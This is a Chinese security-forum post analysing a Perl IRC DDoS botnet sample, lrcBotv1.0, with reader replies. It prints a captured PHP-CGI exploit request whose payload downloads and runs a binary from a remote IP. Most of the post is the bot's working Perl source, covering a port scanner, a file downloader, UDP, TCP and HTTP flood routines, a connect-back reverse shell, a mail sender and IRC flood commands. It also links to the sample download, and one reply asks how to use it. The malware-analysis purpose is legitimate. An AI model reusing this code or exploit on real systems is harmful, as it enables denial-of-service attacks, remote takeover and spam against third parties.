吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 6252|回复: 4
收起左侧

[PC样本分析] DDoS Perl lrcBotv1.0分析

[复制链接]
Cherishao 发表于 2018-2-2 17:51
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!

DDoS Perl lrcBotv1.0分析

0x10 对.cap分析

WireShark追踪流量包,发现异常如下:

POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1

Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 194

<? system("cd /tmp ; wget http://167.88.**.**/js/zmuie ; curl -O http://167.88.**.**/js/zmuie; fetch http://167.88.**.**/js/zmuie ; chmod +x zmuie ; ./zmuie ; perl zmuie; rm -rf zmuie* "); ?>
#系统打开tmp文件夹,通过wget/curl/fetch得到资源zmuie;给zmuie赋予可执行权限,编译,然后执行,最后删除

0x20 对.perl文件进行分析

1、端口扫描
###########端口扫描,对1到65533个端口进行扫描
if ($funcarg =~ /^portscan (.*)/) {
  my $hostip="$1";
  my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
  my (@aberta, %porta_banner);
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1Scanning for open ports on 12".$1." 9,1started. ");
  foreach my $porta (@portas)  {
    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
    if ($scansock) {
      push (@aberta, $porta);
      $scansock->close;
    }
  }
  if (@aberta) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1Open ports found: 12@aberta ");
    } else {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1No open ports found. ");
  }
}
2、正则匹配文件目录
##############
if ($funcarg =~ /^download\s+(.*)\s+(.*)/) {  ##通过正则匹配下载文件目录
        getstore("$1", "$2");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Download] 9,1Downloaded the file: 12$2 9,1from 12$1 ");  ##文件位置
}
##############
if ($funcarg =~ /^dns\s+(.*)/){ #解析DNS
        my $nsku = $1;
        $mydns = inet_ntoa(inet_aton($nsku));
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [DNS] 9,1Resolved: 12$nsku 9,1to 12$mydns ");
}
##############
if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) { #尝试验证上述列出可用端口
        my $hostip= "$1";
        my $portsc= "$2";
        my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
        if ($scansock) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 12Accepted. ");
        }
        else {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 4Refused. ");
        }
}
3、通过UDP-1进行DDos
if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) { #通过UDP-1进行DDos
    return unless $pacotes;
    socket(Tr0x, PF_INET, SOCK_DGRAM, 17); #通过socket通信
    my $alvo=inet_aton("$1");
    my $porta = "$2";
    my $dtime = "$3";
    my $pacote;
    my $pacotese;
        my $size = 0;
    my $fim = time + $dtime;
    my $pacota = 1;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 DDOS] 9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
        while (($pacota == "1") && ($pacotes == "1")) {
            $pacota = 0 if ((time >= $fim) && ($dtime != "0"));
            $pacote = $size ? $size : int(rand(1024-64)+64) ; #文件大小限制在1024个字节内
            $porta = int(rand 65000) +1 if ($porta == "0");
            #send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
            send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
            }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 DDOS] 9,1Attack for 12".$1." 9,1finished in 12".$dtime." 9,1seconds9,1. ");
}
4、通过UDP-2进行DDos
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) { #通过UDP-2进行DDos
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 DDOS] 9,1Attacking 12".$1." 9,1with 12".$2." 9,1Kb Packets for 12".$3." 9,1seconds. ");
        my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); #udpflood使受攻击的机器访问速度变慢,大量资源被占用
        $dtime = 1 if $dtime == 0;
        my %bytes;
        $bytes{igmp} = $2 * $pacotes{igmp};
        $bytes{icmp} = $2 * $pacotes{icmp};
        $bytes{o} = $2 * $pacotes{o};
        $bytes{udp} = $2 * $pacotes{udp};
        $bytes{tcp} = $2 * $pacotes{tcp};
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 DDOS] 9,1Results 12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
}
5、通过TCP进行DDos
if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) { #TCP进行DDos
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [TCP DDOS] 9,1Attacking 12".$1.":".$2." 9,1for 12".$3." 9,1seconds. ");
        my $itime = time;
        my ($cur_time);
        $cur_time = time - $itime;
        while ($3>$cur_time){
        $cur_time = time - $itime;
        &tcpflooder("$1","$2","$3");#udpflood使受攻击的机器访问速度变慢,大量资源被占用
}
        sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [TCP DDOS] 9,1Attack ended on: 12".$1.":".$2."9,1. ");
}
6、通过HTTP协议DDos
if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[HTTP DDOS] 9,1Attacking 12".$1." 9,1on port 80 for 12".$2." 9,1seconds. ");
        my $itime = time;
        my ($cur_time);
        $cur_time = time - $itime;
        while ($2>$cur_time){
        $cur_time = time - $itime;
        my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
        print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
        close($socket);
}
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [HTTP DDOS] 9,1Attacking ended on: 12".$1."9,1. ");
}

0x30 函数解析

1、getprotobyname
if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) { #通过getprotobyname()返回tcp信息获取主机的地址IP,端口
        my $host = "$1";
        my $port = "$2";
        my $proto = getprotobyname('tcp');
        my $iaddr = inet_aton($host);
        my $paddr = sockaddr_in($port, $iaddr);
        my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") { #判断操作系统是否匹配Win32,如果是则启动cmd.exe,并且通过socket通信
        $shell = "cmd.exe";
}
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [ConnectBack] 9,1Connecting to 12$host:$port ");
        socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
        connect(SOCKET, $paddr) or die "connect: $!";
        open(STDIN, ">&SOCKET");
        open(STDOUT, ">&SOCKET");
        open(STDERR, ">&SOCKET");
        system("$shell");#启动系统shell
        close(STDIN);
        close(STDOUT);
        close(STDERR);
}
##############
if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {#通过mail发送/usr/sbin/sendmail
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Sending email to: 12$3 ");
        $subject = $1;
        $sender = $2;
        $recipient = $3;
        @corpo = $4;
        $mailtype = "content-type: text/html";
        $sendmail = '/usr/sbin/sendmail';
        open (SENDMAIL, "| $sendmail -t");
        print SENDMAIL "$mailtype\n";
        print SENDMAIL "Subject: $subject\n";
        print SENDMAIL "From: $sender\n";
        print SENDMAIL "To: $recipient\n\n";
        print SENDMAIL "@corpo\n\n";
        close (SENDMAIL);
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Email Sended to: 12$recipient ");
}
exit;
}
}
2、IRC拒绝服务式攻击

IRC网络上进行flood将用户与IRC服务器(拒绝服务的形式)断开连接的方法,耗尽带宽,导致网络延迟。

##############由于ctcp几乎在每个客户端都被实施,大多数用户对CTCP请求做出响应,通过发送太多请求,经过几个路由,他们将从IRC服务器断开连接。最广泛使用的类型是ping,CTCP。
if ($funcarg =~ /^ctcpflood (.*)/) {
    my $target = "$1";
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1CTCP Flooding: 12".$target." ");
        for (1..10) {
        sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001VERSION\001\n");
        sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001PING\001\n");
        }
}
##############
#msgflood向受害者发送大量私人消息,造成资源占用和拥堵。
if ($funcarg =~ /^msgflood (.*)/) {
    my $target = "$1";
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1MSG Flooding: 12".$target." ");
    sendraw($IRC_cur_socket, "PRIVMSG ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
##############
#noticeflood与msgflood类似,使用notice命名造成资源占用拥堵
if ($funcarg =~ /^noticeflood (.*)/) {
    my $target = "$1";
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1NOTICE Flooding: 12".$target." ");
        for (1..2){
        sendraw($IRC_cur_socket, "NOTICE ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
        }
}
##############

0x40 相关下载

链接:https://pan.baidu.com/s/1pMZrT27 密码:08gy ,压缩包的提取密码:52pojie

程序不含木马,病毒,分析环境为Win7,建议在52虚拟机中运行。

免费评分

参与人数 2威望 +1 吾爱币 +10 热心值 +2 收起 理由
纯黑的噩梦 + 1 请问怎么使用[呲牙]
Hmily + 1 + 10 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

理想呦 发表于 2018-2-2 18:48
前排沙发,谢谢分享,收藏先







    神奇的小尾巴:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4033.400 QQBrowser/9.6.12624.400  (zh-CN)
    ——2018/2/2 下午6:48:54
             
    dshyhome 发表于 2018-2-2 19:27
    萌萌哒的小白 发表于 2018-2-2 20:23
    纯黑的噩梦 发表于 2018-2-6 15:50
    这个怎么用
    您需要登录后才可以回帖 登录 | 注册[Register]

    本版积分规则

    返回列表

    RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

    GMT+8, 2024-11-28 05:39

    Powered by Discuz!

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表